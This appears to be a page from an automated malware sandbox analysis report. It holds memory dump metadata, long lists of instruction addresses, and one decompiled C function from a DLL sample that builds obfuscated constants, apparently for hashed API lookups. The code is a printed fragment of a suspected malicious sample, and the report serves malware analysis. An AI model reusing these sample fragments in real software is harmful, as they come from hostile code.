                                                                                        0x10010d67
                                                                                        0x10010d69
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010d6b
                                                                                        0x10010d6f
                                                                                        0x10010d76
                                                                                        0x10010d77
                                                                                        0x10010d78
                                                                                        0x10010d7a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010d7c
                                                                                        0x10010d7e
                                                                                        0x10010d85
                                                                                        0x10010d85
                                                                                        0x10010d8b
                                                                                        0x10010d8b
                                                                                        0x10010d8d
                                                                                        0x10010d92
                                                                                        0x10010d92
                                                                                        0x10010d9b
                                                                                        0x10010da0
                                                                                        0x10010da5
                                                                                        0x10010dab
                                                                                        0x10010daf
                                                                                        0x10010daf
                                                                                        0x10010db0
                                                                                        0x00000000
                                                                                        0x10010db0
                                                                                        0x10010d80
                                                                                        0x10010d83
                                                                                        0x10010d89
                                                                                        0x10010d89
                                                                                        0x00000000
                                                                                        0x10010d89
                                                                                        0x00000000
                                                                                        0x10010db7
                                                                                        0x10010db7
                                                                                        0x10010db8
                                                                                        0x10010db8
                                                                                        0x00000000
                                                                                        0x10010d56
                                                                                        0x1001089b
                                                                                        0x100108a0
                                                                                        0x100108a6
                                                                                        0x100108a6
                                                                                        0x00000000
                                                                                        0x10010c7d
                                                                                        0x10010c7d
                                                                                        0x10010c7d

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: J}*
                                                                                        • API String ID: 0-3566034359
                                                                                        • Opcode ID: 67d424ff1dabf66e3fcac142e24fdc9017d9d2f9a01eb492ad65698e1adc92f1
                                                                                        • Instruction ID: 2d0b7547684741a8baa3a0fbe14fb8abeb41ea5cf6ce277a40cb2789471ff98d
                                                                                        • Opcode Fuzzy Hash: 67d424ff1dabf66e3fcac142e24fdc9017d9d2f9a01eb492ad65698e1adc92f1
                                                                                        • Instruction Fuzzy Hash: 6B22D134708341AAE760DB20C851BAF77E9EF85384F51892DF8C99F196DBB0E885C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 31%
                                                                                        			E10001494(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                        				intOrPtr _v40;
                                                                                        				intOrPtr _v60;
                                                                                        				void* _v68;
                                                                                        				char _v72;
                                                                                        				char _v76;
                                                                                        				char _v80;
                                                                                        				char _v84;
                                                                                        				char _v88;
                                                                                        				char _v92;
                                                                                        				char _v96;
                                                                                        				char _v100;
                                                                                        				char _v104;
                                                                                        				char _v108;
                                                                                        				char _v112;
                                                                                        				char _v116;
                                                                                        				char _v120;
                                                                                        				char _v124;
                                                                                        				char _v128;
                                                                                        				char _v132;
                                                                                        				char _v136;
                                                                                        				char _v140;
                                                                                        				char _v144;
                                                                                        				char _v148;
                                                                                        				char _v152;
                                                                                        				char _v156;
                                                                                        				char _v160;
                                                                                        				char _v164;
                                                                                        				char _v168;
                                                                                        				char _v172;
                                                                                        				char _v176;
                                                                                        				char _v180;
                                                                                        				char _v184;
                                                                                        				char _v188;
                                                                                        				char _v192;
                                                                                        				char _v196;
                                                                                        				char _v200;
                                                                                        				char _v204;
                                                                                        				char _v208;
                                                                                        				char _v212;
                                                                                        				char _v216;
                                                                                        				char _v220;
                                                                                        				char _v224;
                                                                                        				char _v228;
                                                                                        				char _v232;
                                                                                        				char _v236;
                                                                                        				char _v240;
                                                                                        				char _v244;
                                                                                        				char _v248;
                                                                                        				char _v252;
                                                                                        				char _v256;
                                                                                        				char _v260;
                                                                                        				char _v264;
                                                                                        				char _v268;
                                                                                        				char _v272;
                                                                                        				char _v276;
                                                                                        				void* _v288;
                                                                                        				intOrPtr _v292;
                                                                                        				char _v296;
                                                                                        				char _v300;
                                                                                        				char _v304;
                                                                                        				char _v308;
                                                                                        				char _v312;
                                                                                        				char _v316;
                                                                                        				char _v320;
                                                                                        				char _v324;
                                                                                        				char _v340;
                                                                                        				char _v344;
                                                                                        				char _v348;
                                                                                        				char _v352;
                                                                                        				char _v356;
                                                                                        				void* __ebp;
                                                                                        				void* _t282;
                                                                                        				intOrPtr* _t310;
                                                                                        				intOrPtr* _t318;
                                                                                        				intOrPtr* _t434;
                                                                                        				intOrPtr* _t480;
                                                                                        				void* _t481;
                                                                                        
                                                                                        				_t481 = __eflags;
                                                                                        				_t480 =  &_v60;
                                                                                        				_v40 = __ecx;
                                                                                        				_v76 = 0;
                                                                                        				E1000F5A8( &_v72, 0);
                                                                                        				_v60 = 0x790529cb;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v76, E1000F4F0( &_v76) + 0x10);
                                                                                        				E1000F4E0( &_v80, E1000F4F0( &_v80) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v88 = _v88 + 1;
                                                                                        				_t325 =  &_v84;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v84, E1000F4F0(_t325) + 0x10);
                                                                                        				E1000F4E0( &_v88, E1000F4F0( &_v88) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v96 = _v96 + 1;
                                                                                        				_t329 =  &_v92;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v92, E1000F4F0(_t329) + 0x10);
                                                                                        				E1000F4E0( &_v96, E1000F4F0( &_v96) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v104 = _v104 + 1;
                                                                                        				_t333 =  &_v100;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v100, E1000F4F0(_t333) + 0x10);
                                                                                        				E1000F4E0( &_v104, E1000F4F0( &_v104) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v112 = _v112 + 1;
                                                                                        				_t337 =  &_v108;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v108, E1000F4F0(_t337) + 0x10);
                                                                                        				E1000F4E0( &_v112, E1000F4F0( &_v112) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v120 = _v120 + 1;
                                                                                        				_t341 =  &_v116;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v116, E1000F4F0(_t341) + 0x10);
                                                                                        				E1000F4E0( &_v120, E1000F4F0( &_v120) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v128 = _v128 + 1;
                                                                                        				_t345 =  &_v124;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v124, E1000F4F0(_t345) + 0x10);
                                                                                        				E1000F4E0( &_v128, E1000F4F0( &_v128) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v136 = _v136 + 1;
                                                                                        				_t349 =  &_v132;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v132, E1000F4F0(_t349) + 0x10);
                                                                                        				E1000F4E0( &_v136, E1000F4F0( &_v136) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v144 = _v144 + 1;
                                                                                        				_t353 =  &_v140;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v140, E1000F4F0(_t353) + 0x10);
                                                                                        				E1000F4E0( &_v144, E1000F4F0( &_v144) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v152 = _v152 + 1;
                                                                                        				_t357 =  &_v148;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v148, E1000F4F0(_t357) + 0x10);
                                                                                        				E1000F4E0( &_v152, E1000F4F0( &_v152) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v160 = _v160 + 1;
                                                                                        				_t361 =  &_v156;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v156, E1000F4F0(_t361) + 0x10);
                                                                                        				E1000F4E0( &_v160, E1000F4F0( &_v160) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v168 = _v168 + 1;
                                                                                        				_t365 =  &_v164;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v164, E1000F4F0(_t365) + 0x10);
                                                                                        				E1000F4E0( &_v168, E1000F4F0( &_v168) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v176 = _v176 + 1;
                                                                                        				_t369 =  &_v172;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v172, E1000F4F0(_t369) + 0x10);
                                                                                        				E1000F4E0( &_v176, E1000F4F0( &_v176) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v184 = _v184 + 1;
                                                                                        				_t373 =  &_v180;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v180, E1000F4F0(_t373) + 0x10);
                                                                                        				E1000F4E0( &_v184, E1000F4F0( &_v184) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v192 = _v192 + 1;
                                                                                        				_t377 =  &_v188;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v188, E1000F4F0(_t377) + 0x10);
                                                                                        				E1000F4E0( &_v192, E1000F4F0( &_v192) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v200 = _v200 + 1;
                                                                                        				_t381 =  &_v196;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v196, E1000F4F0(_t381) + 0x10);
                                                                                        				E1000F4E0( &_v200, E1000F4F0( &_v200) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v208 = _v208 + 1;
                                                                                        				_t385 =  &_v204;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v204, E1000F4F0(_t385) + 0x10);
                                                                                        				E1000F4E0( &_v208, E1000F4F0( &_v208) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_t434 = _t480;
                                                                                        				 *_t434 =  *_t434 + 1;
                                                                                        				E100141D8(0xfe338407, _t434);
                                                                                        				E1000F4E0( &_v212, 0x10);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x450], xmm0");
                                                                                        				E1000F4E0( &_v216, 0x20);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x458], xmm0");
                                                                                        				E1000F4E0( &_v220, 0x30);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x460], xmm0");
                                                                                        				E1000F4E0( &_v224, 0x40);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x468], xmm0");
                                                                                        				E1000F4E0( &_v228, 0x50);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x470], xmm0");
                                                                                        				E1000F4E0( &_v232, 0x60);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x478], xmm0");
                                                                                        				E1000F4E0( &_v236, 0x70);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x480], xmm0");
                                                                                        				E1000F4E0( &_v240, 0x80);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x488], xmm0");
                                                                                        				E1000F4E0( &_v244, 0x90);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x490], xmm0");
                                                                                        				E1000F4E0( &_v248, 0xa0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x498], xmm0");
                                                                                        				E1000F4E0( &_v252, 0xb0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4a0], xmm0");
                                                                                        				E1000F4E0( &_v256, 0xc0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4a8], xmm0");
                                                                                        				E1000F4E0( &_v260, 0xd0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4b0], xmm0");
                                                                                        				E1000F4E0( &_v264, 0xe0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4b8], xmm0");
                                                                                        				E1000F4E0( &_v268, 0xf0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4c0], xmm0");
                                                                                        				E1000F4E0( &_v272, 0x100);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4c8], xmm0");
                                                                                        				_t282 = E1000F4E0( &_v276, 0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [esp], xmm0");
                                                                                        				_v252 = E10001D2C(_v248, _t434, _t481, _t282, _t282);
                                                                                        				_t318 = _t434;
                                                                                        				E1000B2C0( &_v248, _v256, _t481, _v252, _t318);
                                                                                        				E1000F864( &_v296, _t481);
                                                                                        				_v300 = 0;
                                                                                        				_t410 =  &_v296;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v296, E1000F4F0(_t410) + 0x10);
                                                                                        				E1000F4E0( &_v300, E1000F4F0( &_v300) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v308 = _v308 + 1;
                                                                                        				_t414 =  &_v304;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v304, E1000F4F0(_t414) + 0x10);
                                                                                        				E1000F4E0( &_v308, E1000F4F0( &_v308) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v316 = _v316 + 1;
                                                                                        				_t418 =  &_v312;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v312, E1000F4F0(_t418) + 0x10);
                                                                                        				E1000F4E0( &_v316, E1000F4F0( &_v316) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				_v324 = _v324 + 1;
                                                                                        				_t422 =  &_v320;
                                                                                        				asm("pxor xmm0, xmm0");
                                                                                        				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                        				E1000F84C( &_v320, E1000F4F0(_t422) + 0x10);
                                                                                        				E1000F4E0( &_v324, E1000F4F0( &_v324) + 0xfffffff0);
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				asm("movsd");
                                                                                        				 *_t480 =  *_t480 + 1;
                                                                                        				_t310 = _t480;
                                                                                        				_push(_t310);
                                                                                        				_push(_t318);
                                                                                        				_push(_v292);
                                                                                        				_t154 = _t310 + 0x2c; // 0x2c
                                                                                        				E1000BA40(_t154,  *_t480);
                                                                                        				E1000F4E0( &_v340, 0);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4d8], xmm0");
                                                                                        				E1000F4E0( &_v344, 0x10);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4e0], xmm0");
                                                                                        				E1000F4E0( &_v348, 0x20);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4d0], xmm0");
                                                                                        				E1000F4E0( &_v352, 0x30);
                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                        				asm("movq [ebp+0x4e8], xmm0");
                                                                                        				E1000F678( &_v316);
                                                                                        				return E1000F678( &_v356);
                                                                                        			}
















































































                                                                                        0x10001494
                                                                                        0x10001498
                                                                                        0x1000149d
                                                                                        0x100014a3
                                                                                        0x100014ab
                                                                                        0x100014b0
                                                                                        0x100014bc
                                                                                        0x100014c0
                                                                                        0x100014d2
                                                                                        0x100014e8
                                                                                        0x100014f3
                                                                                        0x100014f4
                                                                                        0x100014f5
                                                                                        0x100014f6
                                                                                        0x100014f7
                                                                                        0x100014fa
                                                                                        0x100014fe
                                                                                        0x10001502
                                                                                        0x10001509
                                                                                        0x1000151b
                                                                                        0x10001531
                                                                                        0x1000153c
                                                                                        0x1000153d
                                                                                        0x1000153e
                                                                                        0x1000153f
                                                                                        0x10001540
                                                                                        0x10001543
                                                                                        0x10001547
                                                                                        0x1000154b
                                                                                        0x10001552
                                                                                        0x10001564
                                                                                        0x1000157a
                                                                                        0x10001585
                                                                                        0x10001586
                                                                                        0x10001587
                                                                                        0x10001588
                                                                                        0x10001589
                                                                                        0x1000158c
                                                                                        0x10001590
                                                                                        0x10001594
                                                                                        0x1000159b
                                                                                        0x100015ad
                                                                                        0x100015c3
                                                                                        0x100015ce
                                                                                        0x100015cf
                                                                                        0x100015d0
                                                                                        0x100015d1
                                                                                        0x100015d2
                                                                                        0x100015d5
                                                                                        0x100015d9
                                                                                        0x100015dd
                                                                                        0x100015e4
                                                                                        0x100015f6
                                                                                        0x1000160c
                                                                                        0x10001617
                                                                                        0x10001618
                                                                                        0x10001619
                                                                                        0x1000161a
                                                                                        0x1000161b
                                                                                        0x1000161e
                                                                                        0x10001622
                                                                                        0x10001626
                                                                                        0x1000162d
                                                                                        0x1000163f
                                                                                        0x10001655
                                                                                        0x10001660
                                                                                        0x10001661
                                                                                        0x10001662
                                                                                        0x10001663
                                                                                        0x10001664
                                                                                        0x10001667
                                                                                        0x1000166b
                                                                                        0x1000166f
                                                                                        0x10001676
                                                                                        0x10001688
                                                                                        0x1000169e
                                                                                        0x100016a9
                                                                                        0x100016aa
                                                                                        0x100016ab
                                                                                        0x100016ac
                                                                                        0x100016ad
                                                                                        0x100016b0
                                                                                        0x100016b4
                                                                                        0x100016b8
                                                                                        0x100016bf
                                                                                        0x100016d1
                                                                                        0x100016e7
                                                                                        0x100016f2
                                                                                        0x100016f3
                                                                                        0x100016f4
                                                                                        0x100016f5
                                                                                        0x100016f6
                                                                                        0x100016f9
                                                                                        0x100016fd
                                                                                        0x10001701
                                                                                        0x10001708
                                                                                        0x1000171a
                                                                                        0x10001730
                                                                                        0x1000173b
                                                                                        0x1000173c
                                                                                        0x1000173d
                                                                                        0x1000173e
                                                                                        0x1000173f
                                                                                        0x10001742
                                                                                        0x10001746
                                                                                        0x1000174a
                                                                                        0x10001751
                                                                                        0x10001763
                                                                                        0x10001779
                                                                                        0x10001784
                                                                                        0x10001785
                                                                                        0x10001786
                                                                                        0x10001787
                                                                                        0x10001788
                                                                                        0x1000178b
                                                                                        0x1000178f
                                                                                        0x10001793
                                                                                        0x1000179a
                                                                                        0x100017ac
                                                                                        0x100017c2
                                                                                        0x100017cd
                                                                                        0x100017ce
                                                                                        0x100017cf
                                                                                        0x100017d0
                                                                                        0x100017d1
                                                                                        0x100017d4
                                                                                        0x100017d8
                                                                                        0x100017dc
                                                                                        0x100017e3
                                                                                        0x100017f5
                                                                                        0x1000180b
                                                                                        0x10001816
                                                                                        0x10001817
                                                                                        0x10001818
                                                                                        0x10001819
                                                                                        0x1000181a
                                                                                        0x1000181d
                                                                                        0x10001821
                                                                                        0x10001825
                                                                                        0x1000182c
                                                                                        0x1000183e
                                                                                        0x10001854
                                                                                        0x1000185f
                                                                                        0x10001860
                                                                                        0x10001861
                                                                                        0x10001862
                                                                                        0x10001863
                                                                                        0x10001866
                                                                                        0x1000186a
                                                                                        0x1000186e
                                                                                        0x10001875
                                                                                        0x10001887
                                                                                        0x1000189d
                                                                                        0x100018a8
                                                                                        0x100018a9
                                                                                        0x100018aa
                                                                                        0x100018ab
                                                                                        0x100018ac
                                                                                        0x100018af
                                                                                        0x100018b3
                                                                                        0x100018b7
                                                                                        0x100018be
                                                                                        0x100018d0
                                                                                        0x100018e6
                                                                                        0x100018f1
                                                                                        0x100018f2
                                                                                        0x100018f3
                                                                                        0x100018f4
                                                                                        0x100018f5
                                                                                        0x100018f8
                                                                                        0x100018fc
                                                                                        0x10001900
                                                                                        0x10001907
                                                                                        0x10001919
                                                                                        0x1000192f
                                                                                        0x1000193a
                                                                                        0x1000193b
                                                                                        0x1000193c
                                                                                        0x1000193d
                                                                                        0x1000193e
                                                                                        0x10001941
                                                                                        0x10001945
                                                                                        0x10001949
                                                                                        0x10001950
                                                                                        0x10001962
                                                                                        0x10001978
                                                                                        0x10001983
                                                                                        0x10001984
                                                                                        0x10001985
                                                                                        0x10001986
                                                                                        0x1000198c
                                                                                        0x1000198f
                                                                                        0x10001991
                                                                                        0x1000199c
                                                                                        0x100019a3
                                                                                        0x100019ac
                                                                                        0x100019b4
                                                                                        0x100019bb
                                                                                        0x100019c4
                                                                                        0x100019cc
                                                                                        0x100019d3
                                                                                        0x100019dc
                                                                                        0x100019e4
                                                                                        0x100019eb
                                                                                        0x100019f4
                                                                                        0x100019fc
                                                                                        0x10001a03
                                                                                        0x10001a0c
                                                                                        0x10001a14
                                                                                        0x10001a1b
                                                                                        0x10001a24
                                                                                        0x10001a2c
                                                                                        0x10001a36
                                                                                        0x10001a3f
                                                                                        0x10001a47
                                                                                        0x10001a51
                                                                                        0x10001a5a
                                                                                        0x10001a62
                                                                                        0x10001a6c
                                                                                        0x10001a75
                                                                                        0x10001a7d
                                                                                        0x10001a87
                                                                                        0x10001a90
                                                                                        0x10001a98
                                                                                        0x10001aa2
                                                                                        0x10001aab
                                                                                        0x10001ab3
                                                                                        0x10001abd
                                                                                        0x10001ac6
                                                                                        0x10001ace
                                                                                        0x10001ad8
                                                                                        0x10001ae1
                                                                                        0x10001ae9
                                                                                        0x10001af3
                                                                                        0x10001afc
                                                                                        0x10001b04
                                                                                        0x10001b0e
                                                                                        0x10001b17
                                                                                        0x10001b1f
                                                                                        0x10001b26
                                                                                        0x10001b2f
                                                                                        0x10001b37
                                                                                        0x10001b3e
                                                                                        0x10001b43
                                                                                        0x10001b51
                                                                                        0x10001b55
                                                                                        0x10001b64
                                                                                        0x10001b6d
                                                                                        0x10001b72
                                                                                        0x10001b79
                                                                                        0x10001b7d
                                                                                        0x10001b81
                                                                                        0x10001b88
                                                                                        0x10001b9a
                                                                                        0x10001bb0
                                                                                        0x10001bbb
                                                                                        0x10001bbc
                                                                                        0x10001bbd
                                                                                        0x10001bbe
                                                                                        0x10001bbf
                                                                                        0x10001bc2
                                                                                        0x10001bc6
                                                                                        0x10001bca
                                                                                        0x10001bd1
                                                                                        0x10001be3
                                                                                        0x10001bf9
                                                                                        0x10001c04
                                                                                        0x10001c05
                                                                                        0x10001c06
                                                                                        0x10001c07
                                                                                        0x10001c08
                                                                                        0x10001c0b
                                                                                        0x10001c0f
                                                                                        0x10001c13
                                                                                        0x10001c1a
                                                                                        0x10001c2c
                                                                                        0x10001c42
                                                                                        0x10001c4d
                                                                                        0x10001c4e
                                                                                        0x10001c4f
                                                                                        0x10001c50
                                                                                        0x10001c51
                                                                                        0x10001c54
                                                                                        0x10001c58
                                                                                        0x10001c5c
                                                                                        0x10001c63
                                                                                        0x10001c75
                                                                                        0x10001c8b
                                                                                        0x10001c96
                                                                                        0x10001c97
                                                                                        0x10001c98
                                                                                        0x10001c99
                                                                                        0x10001c9a
                                                                                        0x10001c9d
                                                                                        0x10001ca0
                                                                                        0x10001ca1
                                                                                        0x10001ca2
                                                                                        0x10001ca9
                                                                                        0x10001cac
                                                                                        0x10001cb7
                                                                                        0x10001cbe
                                                                                        0x10001cc7
                                                                                        0x10001ccf
                                                                                        0x10001cd6
                                                                                        0x10001cdf
                                                                                        0x10001ce7
                                                                                        0x10001cee
                                                                                        0x10001cf7
                                                                                        0x10001cff
                                                                                        0x10001d04
                                                                                        0x10001d0d
                                                                                        0x10001d15
                                                                                        0x10001d2a

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: g
                                                                                        • API String ID: 0-171373902
                                                                                        • Opcode ID: ba3e336ea50ccbb4ab28022ad21036f20da8c468ff5a58fedb7bec0103fc72bc
                                                                                        • Instruction ID: b442155eacf7675d39859fb34eebdae8123254ffe159dd47b7877bbbb04c0330
                                                                                        • Opcode Fuzzy Hash: ba3e336ea50ccbb4ab28022ad21036f20da8c468ff5a58fedb7bec0103fc72bc
                                                                                        • Instruction Fuzzy Hash: 1032C6764047059AD705DF24C852AFFB3A0EFA2388F10871DB8896A1A7FF71F985D681
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
